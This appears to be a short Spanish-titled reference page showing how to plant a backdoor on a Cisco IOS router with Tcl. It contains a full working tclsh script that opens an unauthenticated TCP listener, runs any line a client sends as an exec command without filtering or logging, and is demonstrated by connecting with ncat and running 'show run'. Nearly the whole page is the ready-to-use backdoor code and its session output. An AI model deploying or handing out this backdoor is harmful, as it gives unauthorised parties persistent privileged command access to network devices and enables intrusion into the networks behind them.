# IOS backdoor con TCL

Introducción

IOS backdoor
TCL

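Ejecución

Los procedimientos se definen en una sesión `tclsh` abierta desde el modo EXEC privilegiado del router; después se arranca el listener y se conecta a él desde un host remoto. El listener no pide autenticación ni filtra el origen de la conexión.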
Router#tclsh
Router(tcl)#proc backdoor {port} {
+> # Open a TCP listener on the given port and serve it until the global
+> # variable loop is written. Nothing in this script authenticates the peer
+> # or restricts its source address, so any host that can reach the port
+> # gets the command channel.
+> # NOTE(review): while vwait blocks, the listener is expected to appear in
+> # the device's TCP tables (for example `show tcp brief all`) and the tclsh
+> # session that started it stays busy - confirm on the platform in use.
+> global shell loop
+> # bdsh is the accept callback, called once per incoming connection.
+> set shell [socket -server bdsh $port]
+> # Enter the event loop; returns only after loop is set (:stop in echo).
+> vwait loop
+> # Tear down the listening socket once the loop has been released.
+> close $shell
+>}

Router(tcl)#proc bdsh {socket ip port} {
+> # Accept callback for the listener: receives the new channel plus the
+> # client's address and port. ip and port are never read in this body, so
+> # the peer is neither checked nor logged by the script.
+> fconfigure $socket -buffering line
+> # Send a bare "#" as the prompt, without a trailing newline.
+> puts -nonewline $socket "#"
+> flush $socket
+> # From here on, every readable event on the channel is handled by echo.
+> fileevent $socket readable [list echo $socket]
+>}

Router(tcl)#proc echo {socket} {
+> # Readable handler: reads one line from the client and dispatches it.
+> #   :exit  closes this connection only
+> #   :stop  sets the global loop, which releases vwait in backdoor so the
+> #          listener is closed, then closes this connection
+> #   any other line is passed unchanged to execute
+> # If gets fails or the channel is at EOF, nothing is done here and the
+> # socket is left open by this proc.
+> global loop
+> if {![catch {gets $socket command}] && ![eof $socket]} {
+>  switch -exact -- $command {
+>   :exit { return [close $socket] }
+>   :stop { set loop end; return [close $socket] }
+>   default { execute $socket $command }
+>  }
+> }
+>}

Router(tcl)#proc execute {socket command} {
+> # Run one client-supplied line and write the result back to the client.
+> # The line is spliced into a string and handed to eval, so it is parsed as
+> # Tcl before exec sees it; there is no allow-list or filtering of any kind.
+> # In the session shown on this page the line runs as an IOS exec command.
+> # NOTE(review): presumably this runs with the rights of the session that
+> # started tclsh - confirm against the device's AAA configuration.
+> # catch stores either the command output or the error text in output.
+> catch {eval "exec $command"} output
+> # If writing the result fails, close the channel; otherwise send the
+> # next "#" prompt.
+> if {[catch {puts $socket $output}]} {
+>  return [close $socket]
+> } else {
+>  puts -nonewline $socket "#"
+>  flush $socket
+> }
+>}

Router(tcl)#backdoor 1234
remote_host# ncat Router 1234
#show run | i hostname
hostname Router
#
